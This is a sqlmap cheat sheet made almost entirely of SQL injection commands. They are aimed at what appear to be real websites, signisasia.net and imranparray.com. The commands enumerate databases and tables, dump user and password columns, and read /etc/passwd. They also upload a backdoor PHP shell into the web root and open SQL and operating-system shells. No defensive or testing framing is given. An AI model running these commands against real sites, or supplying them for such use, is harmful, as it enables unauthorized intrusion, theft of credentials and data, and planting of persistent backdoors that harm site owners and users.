URL WRITING
Single URL
sqlmap -u http://signisasia.net/books/view?id=1 --dbsInput Request in File
- Capture the request with httpheader,burpsuite
- Save it to req.txt
sqlmap -r request.txtInput Request in File(Test only username parameter)
- Capture the request with httpheader,burpsuite
- Save it to req.txt
sqlmap -r req.txt -p usernameTesting a pattern of URL's
- If we have test for a URL scheme injection like
http://signisasia.net/books/1/view
http://signisasia.net/books/2/view
http://signisasia.net/books/3/view- The following URL's can be used to test all the URL's
sqlmap -u http://signisasia.net/books/*/view --dbs[Post injection Direcltly]
sqlmap -u http://imranparray.com/login.php --data "username=imx&pass=imx100&submit=Submit" -p username
> --data is the post data send in the request
> -p is the injection point.Using Cookies
sqlmap -u http://imranparray.com/welcom.php --cookie="PHPSESSID=adsaasd56454a6s54d54" -u http://imranparray.com/welcome/functionality.php?id=100Scanning multiple targets
sqlmap -m urls.txt -dbs --batch'
Extract Databases
sqlmap -u http://signisasia.net/becomemember.php?id=14 --dbs Extract Tables from database
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database --tablesExtract Columns of table_name from database
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name --columnsDumping Data
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name -C colum1,column2,clumn3 --dumpMultithreading
sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --threads 5Null-Connection
sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --null-connectionHTTP Persistant Connection
sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --keep-aliveOutput prediction
sqlmap -u http://signisasia.net/books/view.php?id=100 -D database -T user -c users,password --dump --predict-output[Checking privilages]
sqlmap -u http://signisasia.net/books/view.php?id=100 --privilegesReading Files from the server
sqlmap -u http://signisasia.net/books/view.php?id=100 --file-read=/etc/passwdUploading Files/Shell
sqlmap -u http://signisasia.net/books/view.php?id=100 --file-write=/root/imxx/backdoor.php --file-dest=/var/www/imran.phpSql Shell
sqlmap -u http://imranparray.com/login.php?id=100 --sql-shellOS shell
sqlmap -u http://imranparray.com/login.php?id=100 --os-shellOs Command Exe without Shell Upload
sqlmap -u http://imranparray.com/login.php?id=100 --os-cmd "uname -a"Using Proxy
sqlmap --proxy="127.0.0.1:8888" -u https://imranparray.com/home.php?id=12 --dbs